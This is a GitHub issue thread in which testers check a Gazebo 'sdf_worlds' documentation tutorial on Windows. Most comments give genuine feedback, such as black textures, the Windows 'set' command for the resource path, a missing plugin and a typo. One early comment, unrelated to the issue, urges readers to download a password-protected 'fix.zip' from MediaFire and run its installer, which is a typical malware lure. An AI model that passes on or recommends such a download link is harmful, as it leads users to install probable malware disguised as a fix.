gazebosim/gazebo_test_cases #1048: docs: sdf_worlds

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/docs/ionic/sdf_worlds)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/sdf_worlds.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-10:
You can assign me to this one. 

Sorry for the delay in testing! I was on a trip without computer the last 5 days 😄 I understood that there aren't that many windows testers here so I'll see if I can spread some word on the aerial ROS channels

knmcguire, 2024-09-10:
I was able to complete the tutorials but there were some things that could be improved.

The cokes were black, both in the downloaded version as the spawned versions (see screenshot)

[image].

And some improvements that could have done:
* On top it would be handy to already say that the world is supposed to be called `world_demo.sdf` (I called my test_world.sdf)
* With the entity tree section, it was a bit confusing when it was not a sub header of the Gui section eventhough it had to be within the Gui tag. Luckily the note saved me but that could perhaps also be put a level down
*  For windows cmd prompt the export command is `set GZ_SIM_RESOURCE_PATH="%USERPROFILE%\world_tutorial"` Don't know if it would be necessary to explicitly mention that.
* The final file that could be downloaded on top, didn't contain the plugins like stats and all that the rest of the tutorial had us put in the file. I've attached the full text file I've ended up with. 
* Spawning a model section: typo `Chekout`

[test_world.txt](https://github.com/user-attachments/files/16940058/test_world.txt)